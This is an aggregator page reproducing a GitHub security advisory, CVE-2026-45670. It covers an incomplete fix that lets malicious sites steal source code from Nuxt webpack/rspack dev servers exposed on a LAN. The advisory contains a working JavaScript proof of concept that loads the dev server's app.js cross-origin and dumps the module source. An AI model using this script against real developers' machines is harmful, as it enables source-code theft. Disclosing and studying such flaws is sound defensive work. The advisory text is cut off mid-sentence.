CSIRTS // UNIFIED SECURITY ADVISORY FEEDSYS ● ONLINE · POWERED BY INTELFUSIONS.COM

GHSA-6m52-m754-pw2g: Nuxt: Dev server exposes built source over LAN to malicious sites (incomplete fix for GHSA-4gf7-ff8x-hq99)

mediumCVSS 5.4CVE-2026-45670
Summary This is an incomplete fix for GHSA-4gf7-ff8x-hq99. Source code may be stolen during dev when using the webpack / rspack builder if the dev server is bound to a non-loopback address (e.g. nuxt dev --host) and the developer opens a malicious site on the same network. Details The fix for GHSA-4gf7-ff8x-hq99 relied on Sec-Fetch-Mode and Sec-Fetch-Site headers. Because these headers are sent by the browsers only for potentially trustworthy origins, the check is able to bypass for non-potentially trustworthy origins. Since the attack requires the website to be accessible via a non-potentially trustworthy origin, only apps that are using --host is affected. PoC 1. Create a nuxt project with webpack / rspack builder. 1. Run npm run dev 1. Open http://localhost:3000 1. Run the script below in a web site that has a different origin. 1. You can see the source code output in the document and the devtools console. const script = document.createElement('script') script.src = 'http://192.168.0.31:3000/_nuxt/app.js' // NOTE: replace with the IP address the dev server listens to script.addEventListener('load', () => { const key = Object.keys(window).find(k => k.startsWith("webpackChunk")) for (const page in window[key]) { const moduleList = window[key][page][1] console.log(moduleList) for (const key in moduleList) { const p = document.createElement('p') const title = document.createElement('strong') title.textContent = key const code = document.createElement('code') code.textContent = moduleList[key].toString() p.append(title, ':', document.createElement('br'), code) document.body.appendChild(p) } } }) document.head.appendChild(script) (This script is the similar with GHSA-4gf7-ff8x-hq99 except for the script.src and the global variable name) Impact Users using webpack / rspack builder may get the source code stolen by malicious websites if it uses a predictable host and also is using --host. This vulnerability does not affect Chrome 142+ (and other Chromium based br

Details

Source
GitHub Security Advisories (INTL · database · site)
Severity
medium — CVSS 5.4
Published
2026-05-19
Last updated
2026-07-08
Exploitation
Not in CISA KEV at last sync

Original advisory: https://github.com/advisories/GHSA-6m52-m754-pw2g

Exploitation outlook

EPSS (FIRST.org) estimates each CVE’s probability of exploitation in the next 30 days — here is the CSIRTS.com read on those numbers.

Referenced CVEs

CVECSIRTS overviewExternal
CVE-2026-45670coverage & exploitation statusNVD · CVE.org

More from GitHub Security Advisories